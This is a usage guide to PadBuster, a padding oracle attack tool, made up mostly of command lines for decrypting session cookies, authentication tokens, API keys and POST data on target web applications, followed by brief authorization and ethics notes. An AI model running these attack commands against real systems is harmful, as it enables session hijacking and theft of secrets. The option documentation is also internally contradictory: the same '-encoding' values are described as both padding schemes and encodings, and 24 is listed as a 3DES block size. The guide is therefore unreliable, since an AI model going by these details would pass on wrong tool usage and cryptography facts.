PadBuster

PadBuster is an automated padding oracle attack tool designed to exploit padding oracle vulnerabilities in applications using CBC-mode encryption. It demonstrates how flawed error handling can leak information about encrypted data through timing and error messages, allowing attackers to decrypt ciphertext without knowing the encryption key.

Installation

Linux Installation

# Install Perl (PadBuster requirement)
sudo apt-get install perl libwww-perl

# Download PadBuster
wget http://www.gdssecurity.com/l/tools/padbuster/padbuster.pl

# Set execute permissions
chmod +x padbuster.pl

# Verify installation
perl padbuster.pl

macOS Installation

# Ensure Perl is installed
perl -v

# Install required Perl modules
cpan install LWP::UserAgent
cpan install HTTP::Cookies

# Download PadBuster
curl -O http://www.gdssecurity.com/l/tools/padbuster/padbuster.pl
chmod +x padbuster.pl

Perl Module Dependencies

# Install required modules
cpan install LWP::UserAgent
cpan install HTTP::Cookies
cpan install URI::URL

# Or via CPAN batch
perl -MCPAN -e 'install "LWP::UserAgent"'
perl -MCPAN -e 'install "HTTP::Cookies"'

Core Concepts

Padding Oracle Vulnerability

A padding oracle occurs when an application:

• Encrypts data using CBC-mode cipher
• Returns different error messages for valid vs. invalid padding
• Allows attackers to observe these differences (timing or response)
• Creates an information leak exploitable for decryption

Attack Mechanics

• Attacker observes valid vs. invalid padding responses
• Systematically modifies ciphertext bytes
• Observes oracle feedback to deduce plaintext
• Decrypts one block at a time
• Requires no key knowledge

Assumptions

• Application reveals padding validity through errors or timing
• CBC-mode encryption is used
• Attacker can submit arbitrary ciphertexts
• Response differences are observable and consistent

Basic Usage

Simple Padding Oracle Attack

# Basic attack on encrypted cookie
perl padbuster.pl \
  http://target.example.com/ \
  6E7CB7C98FDB35A02ABD3D30E3A9B4B8 \
  8 \
  -cookies "AUTH=ABCD1234"

# Explain parameters
# URL: target application
# Ciphertext: encrypted data to decrypt
# Block size: cipher block size (8 for DES, 16 for AES)
# -cookies: include cookies in requests

Specify Proxy and User Agent

perl padbuster.pl \
  http://target.example.com/app \
  encrypted_cookie_value \
  16 \
  -proxy http://127.0.0.1:8080 \
  -user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"

Verbose Output

# Maximum verbosity
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext_value \
  16 \
  -verbose

# Debug mode
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext_value \
  16 \
  -debug

Target Identification

Identify Vulnerable Parameters

# Test cookie-based encryption
perl padbuster.pl \
  http://target.example.com/ \
  cookie_ciphertext \
  16 \
  -cookies "SESSION=ABC123"

# Test URL parameter encryption
perl padbuster.pl \
  http://target.example.com/view?data=ciphertext \
  ciphertext \
  16 \
  -parameter data

Determine Block Size

# Manual block size detection
perl padbuster.pl \
  http://target.example.com/ \
  encrypted_data \
  8 \
  -test

# Try common block sizes: 8 (DES), 16 (AES), 24 (3DES)
perl padbuster.pl http://target.example.com/ data 8 -test
perl padbuster.pl http://target.example.com/ data 16 -test

Identify Padding Scheme

# Standard PKCS#7 padding (default)
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16

# PKCS#5 padding
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -encoding 0

# NULL padding
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -encoding 2

Attack Execution

Attack Encrypted Cookie

# Decrypt session cookie
perl padbuster.pl \
  http://target.example.com/ \
  F8A3B6E2C91D4F7A8E2B5C9A1D4F7E2B \
  16 \
  -cookies "SESSION=F8A3B6E2C91D4F7A8E2B5C9A1D4F7E2B" \
  -encoding 1

# Specify only target parameter
perl padbuster.pl \
  http://target.example.com/ \
  encrypted_value \
  16 \
  -cookies "AUTH=ABC;ID=12345" \
  -parameter-cookie AUTH

Attack Query Parameters

# Decrypt URL parameter
perl padbuster.pl \
  http://target.example.com/app?id=ABCD1234&user=encrypted_here \
  encrypted_value \
  16 \
  -parameter user

# Multiple parameters
perl padbuster.pl \
  http://target.example.com/app?data=value \
  value \
  16 \
  -parameter data \
  -url "http://target.example.com/app?data=[PLACEHOLDER]"

Attack POST Data

# Decrypt POST body parameter
perl padbuster.pl \
  http://target.example.com/submit \
  encrypted_value \
  16 \
  -method POST \
  -parameter payload

# Custom POST data
perl padbuster.pl \
  http://target.example.com/login \
  encrypted_credentials \
  16 \
  -method POST \
  -data "username=admin&encrypted=VALUE" \
  -parameter encrypted

Advanced Options

Custom Encoding

# Hex encoding (default)
perl padbuster.pl \
  http://target.example.com/ \
  hex_ciphertext \
  16 \
  -encoding 1

# Base64 encoding
perl padbuster.pl \
  http://target.example.com/ \
  base64_ciphertext \
  16 \
  -encoding 0

# URL encoding
perl padbuster.pl \
  http://target.example.com/ \
  url_encoded_ciphertext \
  16 \
  -encoding 2

Response Analysis

# Look for specific error string
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -error "Invalid Padding" \
  -noerror

# Response length analysis
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -error "Decryption Failed"

# Response time analysis
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -timing

Proxy Configuration

# Burp Suite proxy
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -proxy http://127.0.0.1:8080 \
  -proxycreds username:password

# SOCKS proxy
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -proxy socks5://127.0.0.1:9050

Custom Headers

# Add authorization header
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -header "Authorization: Bearer token123"

# Multiple headers
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -header "Authorization: Bearer token" \
  -header "X-Custom-Header: value"

Decryption Workflow

Stage 1: Determine Block Size

# Send increasingly longer plaintexts
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  8 \
  -test  # Try block size 8 first

# If fails, try:
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -test  # Try block size 16 (AES)

Stage 2: Identify Padding Error

# Request should produce padding error
perl padbuster.pl \
  http://target.example.com/ \
  corrupted_ciphertext \
  16 \
  -error "Invalid Padding" \
  -noerror

Stage 3: Execute Attack

# Run full decryption
perl padbuster.pl \
  http://target.example.com/ \
  full_ciphertext \
  16 \
  -cookies "SESSION=full_ciphertext" \
  -verbose

# Output shows decrypted plaintext block by block

Plaintext Recovery

Decrypt Entire Message

# Attack multiple blocks
perl padbuster.pl \
  http://target.example.com/ \
  8A9B2C4D6E8F1A3C5E7F9A1B3D5E7F8A \
  16 \
  -cookies "DATA=8A9B2C4D6E8F1A3C5E7F9A1B3D5E7F8A"

# Automatically decrypts all blocks
# Outputs: Block 1: ... Block 2: ...

Save Decrypted Data

# Redirect output to file
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -cookies "AUTH=ciphertext" 2>&1 | tee decrypted.txt

# Parse specific blocks
grep "Block " decrypted.txt | cut -d: -f2

Plaintext Analysis

# Look for structure
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 | grep -E "(Block|admin|user|id)"

# Hex to ASCII conversion
perl padbuster.pl ... | xxd -r -p

Encryption Oracle Bypass

Test Oracle Responses

# Send crafted ciphertext
perl padbuster.pl \
  http://target.example.com/ \
  test_ciphertext \
  16 \
  -test \
  -verbose

# Observe response patterns
# Success: application processes request
# Failure: padding error message

Modify Ciphertext Bytes

# Exploit byte-by-byte feedback
perl padbuster.pl \
  http://target.example.com/ \
  original_ct \
  16 \
  -cookie "ENCRYPTED=original_ct" \
  -verbose

# Attack modifies ciphertext systematically
# Oracle responses reveal plaintext bytes

Attack Scenarios

Decrypt Session Cookies

# Typical web application attack
perl padbuster.pl \
  http://vulnerable.app/dashboard \
  9B2F5A8E3D7C1B6F4E9A2D5B8F1C3E7A \
  16 \
  -cookies "PHPSESSID=9B2F5A8E3D7C1B6F4E9A2D5B8F1C3E7A" \
  -encoding 1 \
  -verbose

# Output reveals session data structure
# May contain user ID, role, timestamp

Decrypt Authentication Tokens

# JWT or custom token in cookie
perl padbuster.pl \
  http://target.example.com/ \
  encrypted_token \
  16 \
  -cookies "TOKEN=encrypted_token" \
  -parameter-cookie TOKEN

# Reveals token structure and values
# May expose user privileges, identity

Decrypt Configuration Data

# API key or secret in parameter
perl padbuster.pl \
  http://api.example.com/config \
  encrypted_key \
  16 \
  -parameter apikey \
  -method GET \
  -url "http://api.example.com/config?apikey=[PLACEHOLDER]"

Troubleshooting

No Successful Decryption

# Verify correct ciphertext format
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -test \
  -verbose

# Check block size
for size in 8 16 24 32; do
  perl padbuster.pl http://target.example.com/ ct $size -test 2>/dev/null && echo "Size: $size"
done

Padding Error Not Detected

# Specify custom error message
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -error "Decryption" \
  -noerror

# Try timing-based detection
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -timing

Connection Issues

# Use proxy for debugging
perl padbuster.pl \
  http://target.example.com/ \
  ciphertext \
  16 \
  -proxy http://127.0.0.1:8080 \
  -verbose

# Verify URL is correct
perl padbuster.pl \
  http://target.example.com/vulnerable \
  ciphertext \
  16 \
  -test

Best Practices

Pre-Attack Assessment

• Verify authorization for testing
• Identify all encrypted parameters
• Document baseline encryption behavior
• Test on non-critical data first
• Establish scope boundaries

Safe Testing

# Test on controlled application instance
perl padbuster.pl \
  http://test-server.internal/ \
  test_ciphertext \
  16 \
  -test \
  -verbose

# Verify behavior matches production
# Document all assumptions about oracle

Mitigation Verification

# After patching, verify attack fails
perl padbuster.pl \
  http://target.example.com/ \
  test_ciphertext \
  16 \
  -test

# Should show no valid decryption path
# Confirms padding oracle is closed

Legal and Ethical Considerations

PadBuster should only be used:

• On systems you own or have written authorization to test
• In authorized penetration testing engagements
• For security research and education
• In compliance with applicable laws
• Within clearly defined scope

Always maintain:

• Written authorization documentation
• Detailed records of testing activities
• Proper handling of decrypted sensitive data
• Professional ethical standards
• Confidentiality of findings

Resources

• Official PadBuster page
• Padding oracle exploitation guides
• CBC-mode cipher vulnerability research
• OWASP cryptography guidelines
• Academic papers on padding oracles